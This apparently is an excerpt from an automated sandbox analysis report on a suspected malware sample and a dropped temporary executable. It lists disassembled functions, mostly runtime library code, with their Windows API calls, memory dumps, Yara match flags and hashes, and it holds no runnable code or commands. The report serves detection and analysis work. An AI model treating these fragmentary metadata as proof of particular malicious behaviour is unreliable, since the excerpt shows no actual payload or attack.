Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 024828EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 024828F8
GetLastError.KERNEL32 ref: 02482904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0248291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02482928

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 6bdd722bb6f6267576dccc9c198659edf368ef9c4099716b17cf10c88709ef7f
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 19E086346101096BCB14FF76CC05BBF376C6B00745B500926BC55D20A0EF79D1048AAC

Function 024829B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02487BD8,00000000,?,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024829CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024829E0
__CxxThrowException@8.LIBVCRUNTIME ref: 024829EE

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 777ef01c951a7e125f9b0e7ec1c04890caf91ed541871510d7ac9227cbf2b22f
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 04E086352101096BDB10FF75CC08BBF376C6F00745B500926BD59D10A0EF75D1149AAC

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 02482959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F
GetLastError.KERNEL32 ref: 0248296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482982
__CxxThrowException@8.LIBVCRUNTIME ref: 02482990

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: e6ae053326569088123ac172e3d09ea79bb09a4af3f6f20b39d29d3f18cb0259
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 4FE02B301101456BC714FBBD9C4CB7F32AC6B01715BA00F2BF861E20E0EFA8D1084AAC

Function 00411E98 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C

Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8

Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7

Concurrency::Context::Block.LIBCONCRT ref: 00411EAD

Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63

Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD

Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88

Function 024820FF Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 02482103

Part of subcall function 02481379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0248139A
Part of subcall function 02481379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024813D1
Part of subcall function 02481379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024813DD

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0248210F

Part of subcall function 02480CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02480D0E

Concurrency::Context::Block.LIBCONCRT ref: 02482114

Part of subcall function 02482EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02482ECA

Concurrency::critical_section::lock.LIBCONCRT ref: 02482134

Part of subcall function 024812A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024812B0
Part of subcall function 024812A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024812BD
Part of subcall function 024812A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024812C8

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: cac33b1527446063a4cc46baa9da76d26afef70897e8634251290038e0664877
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: 5CE0DF359201069BCB08FF22C5604ACBB62BF81310B14430FD46A472E0CF746E4ACF84

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

OCP, xrefs: 0043AEBD
ACP, xrefs: 0043AE87

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 024AB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024AB32B,?,00000050,?,?,?,?,?), ref: 024AB1AB

Strings

OCP, xrefs: 024AB124
ACP, xrefs: 024AB0EE

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: d996299ac57833f46d975cbf63b7a7074f7d35f5bbe6985b5cbf979b0331125b
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: DD21B372B00105A6EB268F649D61BA7739AEF74BDCF4A8126E909DB304F732D941C390

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0041DA0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61

Strings

pContext, xrefs: 0041DA4B

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

RCC, xrefs: 004406C3
MOC, xrefs: 004406B4

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

zB, xrefs: 00423821
~B, xrefs: 00423827

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Function 0249B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02472AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02472AAD,00000000), ref: 0249B187
GetLastError.KERNEL32 ref: 0249B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02472AAD,00000000), ref: 0249B1F0

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: c066610513b409a7f41cbeb56effab23d5d1aa2c42a6952ac498485592969778
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 8B41F631604216AFCF21CFA9EC48BBF7FA5EF41758F14416BE8599B2A0DB708901CB60

Analysis Process: 5759.tmp.exePID: 5660, Parent PID: 2536COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	44.4%
Signature Coverage:	17.5%
Total number of Nodes:	63
Total number of Limit Nodes:	5

Executed Functions

Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087B4
GetCurrentThreadId.KERNEL32 ref: 004087BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
GetForegroundWindow.USER32 ref: 00408870
ExitProcess.KERNEL32 ref: 00408972

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CD85

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A

Function 0043B05B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Function 0040BDC9 Relevance: .1, Instructions: 61COMMON

